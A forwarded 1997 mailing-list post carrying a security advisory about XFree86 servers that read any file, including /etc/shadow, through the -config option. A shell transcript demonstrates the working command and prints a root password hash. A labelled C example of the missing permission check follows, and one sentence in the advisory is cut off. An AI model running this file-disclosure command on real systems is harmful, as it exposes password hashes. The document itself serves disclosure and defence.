XFree86 insecurity (fwd)

Anyone know if Debian is vulnerable to this, given that the setuid
/usr/X11R6/bin/X is a wrapper for the XFree86 server?

I'd like to know before I chmod u-s /usr/X11R6/bin/X...



From: shegget <root@SHEGG.RH1.IIT.EDU>
Date: Fri, 21 Nov 1997 18:35:36 +0000
Subject: XFree86 insecurity

                  plaguez security advisory n.10

                        XFree86 insecurity

Program:   XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)

Version:   Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
           Other versions as well.

OS:        All

Impact:    The XFree86 servers let you specify an alternate configuration
           file and do not check whether you have rights to read it.
           Any user can read files with root permissions.

Just a short one to tell you about this "feature" I found in all default
XFree86 servers...

Here it is:

Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/fr-latin1.map
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw-------   1 root     bin          1039 Aug 21 20:12  /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a #                   mouse acceleration (pixels)
-ac                    disable access control restrictions
-audit int             set audit trail level
-auth file             select authorization file
bc                     enable bug compatibility
-bs                    disable any backing store support
-c                     turns off key-click

... and so on.  HINT: look at the first XF86_SVGA output line.


If you run xdm, you should consider removing the setuid bit of the

If not, well, wait for the XFree86 Project to bring you a patch, since I'm
too lazy to find and fix it.
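
The check the Impact section says is missing, as an added example that is not part of the original advisory and is not XFree86 code: a setuid program opening a user-supplied configuration path with the invoking user's credentials. The helper name open_config_as_invoker is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (assumption, not XFree86 code): open a user-supplied
 * config path with the invoking user's credentials rather than the setuid
 * owner's. Returns a read-only fd, or -1 with errno set. */
int open_config_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    struct stat st;
    int fd, err = 0;

    /* Take on the real (invoking) IDs: group first, while still privileged. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        err = errno;
        (void)setegid(saved_egid);
        errno = err;
        return -1;
    }
    /* The kernel checks the invoker's permissions on the open itself, so
     * there is no access()-then-open() window. Accept regular files only. */
    fd = open(path, O_RDONLY | O_NOCTTY | O_NONBLOCK);
    if (fd < 0) {
        err = errno;
    } else if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        err = EINVAL;
        close(fd);
        fd = -1;
    }
    /* Regain privileges for the rest of start-up; never run half-dropped. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        _exit(1);
    if (fd < 0)
        errno = err;
    return fd;
}

int main(int argc, char **argv)
{
    int fd = argc > 1 ? open_config_as_invoker(argv[1]) : -1;
    return fd < 0 ? 1 : close(fd);
}
```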


